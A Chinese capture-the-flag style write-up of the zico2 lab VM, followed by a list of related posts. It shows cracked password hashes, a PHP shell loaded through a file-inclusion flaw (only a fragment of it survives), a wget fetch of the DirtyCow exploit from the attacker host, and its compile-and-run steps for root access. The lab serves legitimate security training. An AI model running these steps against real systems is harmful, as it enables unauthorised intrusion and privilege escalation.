JKding233
JKding233

zico2靶机练习

参考:https://blog.csdn.net/qq_38684504/article/details/90105790

运行环境:viirtualbox

网络:桥接模式

主机发现

zico2靶机练习_第1张图片

主机扫描

zico2靶机练习_第2张图片

目录扫描

zico2靶机练习_第3张图片

zico2靶机练习_第4张图片

zico2靶机练习_第5张图片

弱口令(admin)登录

zico2靶机练习_第6张图片

存在两个账号

somd5.com解密

root    653F4B285089453FE00E2AAFAC573414(34kroot34)

zico    96781A607F4E9F5F423AC01F0DAB0EBD(zico2215@)

浏览网站,发现存在文件包含漏洞

zico2靶机练习_第7张图片

在网站数据库中上传脚本文件来获取靶机的shell

root@kali:~# cd /var/www/html

root@kali:/var/www/html# vim shell.txt

root@kali:/var/www/html# cat shell.txt

&3 2>&3");?>

root@kali:/var/www/html# /etc/init.d/apache2 start

zico2靶机练习_第8张图片

访问数据库文件就可获得shell

zico2靶机练习_第9张图片

目标主机存在python环境

$ python -c 'import pty;pty.spawn("/bin/bash")'

zico2靶机练习_第10张图片

脏牛提权,exp提示

// To use this exploit modify the user values according to your needs.

// The default is "firefart".

// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):

// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

// Compile with:

// gcc -pthread dirty.c -o dirty -lcrypt

// Then run the newly create binary by either doing:

// "./dirty" or "./dirty my-new-password"

// Afterwards, you can either "su firefart" or "ssh firefart@..."

// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!

// mv /tmp/passwd.bak /etc/passwd

www-data@zico:/tmp$ wget http://192.168.0.103/dirty.c

www-data@zico:/tmp$ gcc -pthread dirty.c -o exp -lcrypt

www-data@zico:/tmp$ ./exp JKding233

看以看到提权成功

zico2靶机练习_第11张图片

root目录下发现flag

zico2靶机练习_第12张图片

home目录下

zico2靶机练习_第13张图片

使用zico用户可以进行ssh登录

zico2靶机练习_第14张图片

你可能感兴趣的:(zico2靶机练习)

  • CISP-PTE考试通关经验 Python_chichi 互联网职业发展科技android
    考试题型考试题型氛围选择题(20分)+基础题(50分)+综合题(三个key30分),70分以上通过,也就是选择题保证10分以上,基础题全做出来的话,至少要做出综合题第一道小题。一、选择题主要考察基础知识,前四天老师都有讲,另外还发了一些题库,看一遍的话,基本考10分以上问题不大。二、基础题1.sql注入第一题sql注入是一个文章发表系统,培训的时候靶机练习有做过,但是不太一样,注册用户登录之后,注
  • Gaara靶机练习 郑居中3.0 Gaara靶机gdb提权
    渗透测试一.信息收集1.确定IP地址2.nmap扫描3.目录扫描二.hydra爆破1.ssh连接2.信息探索三.提权gdb提权提权一.信息收集1.确定IP地址┌──(root㉿kali)-[~/kali/web]└─#arp-scan-lInterface:eth0,type:EN10MB,MAC:00:0c:29:10:3c:9b,IPv4:192.168.9.10Startingarp-sca
  • Neos的渗透测试靶机练习——DarkHole-2 Dr.Neos 靶场练习渗透测试网络安全sqlgit服务器
    DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DarkHole-2(网卡初始为仅主机模式,要有安全意识)靶机网卡有问题需要提前修改,进入系统前先按shift,然后按e进入编辑模式,将ro至initrd之前的内容修改为rwsing
  • Neos的渗透测试靶机练习——DarkHole-1 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
    DarkHole-1一、实验环境二、开始渗透1.搜集信息2.sql注入4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DarkHole-1(网卡初始为仅主机模式,要有安全意识)靶机网卡有问题需要提前修改,进入系统前先按shift,然后按e进入编辑模式,将ro至initrd之前的内容修改为rwsingleinit=/b
  • Neos的渗透测试靶机练习——DC-8 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
    DC-8一、实验环境二、开始渗透1.搜集信息2.sql注入(1)测试注入点(4)sqlmap3.PHP上传,反弹shell4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-8(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身i
  • Neos的渗透测试靶机练习——DC-9 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
    DC-9一、实验环境二、开始渗透1.搜集信息2.sql注入3.文件包含漏洞4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-9(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.16
  • Neos的渗透测试靶机练习——DC-7 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
    DC-7一、实验环境二、开始渗透1.搜集信息2.文件上传3.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-7(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.56.101。
  • Neos的渗透测试靶机练习——DC-5 Dr.Neos 靶场练习安全渗透测试网络安全web安全网络
    DC-5一、实验环境二、开始渗透1.搜集信息2.文件包含漏洞3.反弹shell三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-5(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.
  • Neos的渗透测试靶机练习——Wakanda Dr.Neos 靶场练习安全渗透测试网络安全web安全
    Wakanda一、实验环境二、开始渗透(根据流程学习思路)1.获知本机IP、靶机IP2.靶机端口、协议、前端信息(Nmap)3.进入后台,查看敏感数据三、总结一、实验环境虚拟机软件:VirtualBox攻击机:KaliLinux(仅主机模式)靶机:Wakanda(仅主机模式,共有3个flag)二、开始渗透(根据流程学习思路)1.获知本机IP、靶机IP切换到root用户(输入sudosu及对应的密码
  • Neos的渗透测试靶机练习——DC-3 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
    DC-3一、实验环境二、开始渗透1.搜集信息2.sqlmap3.上传PHP木马三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-3(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.
  • 渗透测试-靶机DC-2-知识点总结 Dr.Neos 靶机-知识点总结安全渗透测试网络安全web安全网络
    靶机DC-2-知识点总结一、前言二、实验环境三、渗透测试工具1.cewl(1)cewl简介(2)cewl常见用法2.wpscan(1)wpscan简介(2)wpscan常见用法直接扫描-eu爆破用户名-U、-P爆破账户密码3.dirb(1)dirb简介(2)dirb常见用法四、渗透测试技巧1.rbash逃逸2.git提权五、总结一、前言本次渗透测试具体流程详见Neos的渗透测试靶机练习——DC-2
  • hackmyvm Rei靶机练习 活着Viva hackmyvm渗透测试
    主机发现端口扫描漏洞挖掘权限提升主机发现攻击机ip靶机ip-sn发送arp请求包探测目标ip是否在线端口扫描-p-所有端口扫描-sV查询开放端口的服务这里65333是ssh服务,63777是http服务最好拿个记事本记住漏洞挖掘浏览靶机的默认页面,查查有什么漏洞它说indexp.txt在web的默认目录,那我访问一下。indexp.txt下显示了哪些目录可以访问,哪些目录不可以访问,类似于robo
  • vulnhub靶机练习-Os-hackNos Asson
    0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|Enumeration|PrivilegeEscalationWebsite:www.hackNos.commail:[email protected]靶机下载https://www.vulnh
  • Linux靶机练习 小小西贝 LinuxWeb安全靶机练习安全网络安全linux
    文章目录第1次Lampiao1.信息收集1.1netdiscover扫描1.2namp扫描第1次扫描第2次扫描1.3御剑扫描打开扫描到的文件打开登录网站sql注入链接跳转node/1node/3node/22.漏洞探测2.1利用cewl获取网站信息2.2ssh进行登录查看靶机信息:3.提权3.1利用脏牛提权3.2对40847文件的操作3.3tiago用户下载40847.cpp文件3.4获取root
  • 靶机练习2之利用Linux版本内核漏洞实现本地权限提升 yuan_boss 保护国家网络安全linuxubuntu靶机本地权限提升漏洞kali
    文章目录信息收集1.扫描网段2.扫描敏感目录渗透阶段密码爆破查看主机内核查找版本漏洞查看漏洞详细信息拷贝漏洞到本地将漏洞文件传到靶机漏洞利用信息收集1.扫描网段建议开启两个终端,首尾扫描,提高速度与准确性从0开始扫描nmap10.9.136.0/24从后面开始扫描nmap-r10.9.136.0/24扫描完成后,发现有个主机10.9.136.231开放了80端口,直接访问该主机,发现只有一个图片,
  • Vulnhub-Raven1 靶机练习 GloryGod Vulnhub网络安全网络安全
    靶机地址:Raven:1~VulnHub1.基本信息Kali:192.168.26.131靶机:192.168.26.1362.信息收集arp-scan-l或者nmap-sn192.168.26.0/24之后进行全端口扫描,保证自己的隐蔽性(假设真实环境)nmap-sT--min-rate10000-p-192.168.26.136-oA./nmap_report/raven1/port紧接着进行
  • 靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权 LuckyCharm~ 靶机学习安全
    靶机练习No.23Vulnhub靶机DarkHole20x00环境准备0x01信息收集步骤一:ip探测步骤二:端口扫描0x02漏洞挖掘思路一:web漏洞挖掘(.git信息收集)思路二:22ssh爆破步骤一:githack.py收集.git步骤二:从git仓库审查代码及数据库文件(1)config/config.php(2)审计index.phplogin.phpdashboard.php步骤三:g
  • Vulhub 刷题(一) Sprint#51264 渗透测试靶场网络安全vulnhub渗透测试
    title:vulnhubsubtitle:渗透入门date:2022-08-02author:Sprint#51264文章目录引言一:breach1.0启发二:billux:box流程启发三:Bulldog1流程启发四:LazySysAdmin:1流程启发五:Freshly流程启发六:FristiLeaks流程启发七:TheEther流程启发八:zico2流程启发九:Quaoar流程启发十:Si
  • 【靶机练习】Vulnhub靶场Earth-练习记录 小白帽的成长 网络安全渗透测试linux服务器centos
    注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开信息收集攻击机IP:192.168.43.118主机发现:sudonmap-sP192.168.43.1/24确认目标机IP:192.168.43.241端口扫描:sudonmap-sC-sV-p-192.168.43.241扫描结果:目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。没修改hosts
  • SQL注入靶机练习:BUU SQL COURSE 1 燕麦葡萄干 渗透测试学习渗透测试SQL注入BUUCTF
    SQL注入靶机练习:BUUSQLCOURSE1一、SQL注入知识点二、前置知识三、SQL注入测试的一般步骤四、解题过程一、SQL注入知识点可参考SQL注入详解二、前置知识参考来源:渗透攻防Web篇-深入浅出SQL注入mysql5.0以上版本中存在一个重要的系统数据库information_schema,通过此数据库可访问mysql中存在的数据库名、表名、字段名等元数据。information_sc
  • Vulnhub靶场-DC-1靶机练习 .风溪. DC靶机
    Vulnhub-DC-1daoyuan##零、环境配置1、虚拟机:vmware15.5.62、攻击环境:kalilinux2020.3192.168.143.1283、靶机:DC-1靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。一、攻击过程一、主机存活扫描arp-scan-l探测到目标ip:192.168.143.134二、端口扫描namp-A-p-192.168.143.1
  • Vulnhub靶场-DC-2靶机练习 .风溪. DC靶机
    Vulnhub-DC-2daoyuan零、环境配置1、虚拟机:vmware15.5.62、攻击环境:kalilinux2020.3192.168.143.1283、靶机:DC-2靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。一、信息收集1、主机存活扫描arp-scan-l2、端口扫描nmap-A-p-192.168.143.135发现开放的端口以及服务80wordpress7
  • JIS-CTF: VulnUpload 靶机练习 yemansleep
    1.靶机介绍VM名称:JIS-CTF:VulnUpload难度:初学者说明:此机器上有五个标志。试着找到它们。平均需要1.5小时才能找到所有旗帜。2.信息收集2.1对靶机进行端口扫描,发现只有80,22端口开放image.png2.2查看网站的robots.txt发现有如下目录User-agent:*Disallow:/Disallow:/backupDisallow:/adminDisallow
  • Vulnhub靶机渗透之zico2 漫路在线 安全linux安全
    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描,请求重发,漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhu
  • Vulnhub靶场渗透-zico2 paidx0 Vulnhub渗透靶场学习kalilinux安全
    前言靶机ip(192.168.110.128)攻击机ip(192.168.110.127)网络NAT模式这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈信息收集打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录很明显是数据库,手试了一波弱口令给我进去了,就是admin漏洞挖掘简单说一下phpliteadmin
  • Zico2靶机提点 安全
    扫描端口,开了80,22,rpc,dirb扫描80发现如下:以及view.php有本地文件包含:访问dbadmin目录下的test_db.php,发现phpLiteAdminv1.9.3,网上搜索默认密码为admin,一试果然通过了。接着搜一下exploit:照着操作,先建一个数据库命名为hack.php,然后写一个一句话木马,然后文件包含过去,然后蚁剑一连:这里有一个坑点,数据库里有俩用户密码都
  • 做一个靶机练习_djinn 五行缺金 golang
    前几天一直在背资料,背的很烦,找个靶机来玩玩.第一件事,先找一下主机地址,由于我在自己的局域网内,我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话,可以用nmap检测一下,sS是指用半开放式扫描,不会完成三次握手,速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
  • 做一个靶机练习_djinn 五行缺金 golang
    前几天一直在背资料,背的很烦,找个靶机来玩玩.第一件事,先找一下主机地址,由于我在自己的局域网内,我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话,可以用nmap检测一下,sS是指用半开放式扫描,不会完成三次握手,速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
  • 渗透测试靶机练习(一)之lazysysadmin 不断积淀 渗透测试
    lzaysysadmin情报搜集主机发现,使用netdiscover主机扫描,使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果,有workpress和phpmyadmin登录网站,查看robots.txt文件存在目录遍历漏洞,但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机扫描中发现445端口共享文件发现三个共享的文件夹Linux下挂载
  • DC-5靶机练习 水中煮鱼冒气 靶机练习
    DC-5靶机练习文件下载链接第一部分信息收集第一步信息收集第二步扫描开放的端口第三步访问80端口[打开Contact页面,发现是一个留言板块,在留言板块输入内容并提交]第四步:观察网页第二部分文件包含漏洞第一步:使用BurpSuite抓包,爆破后台页面[发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他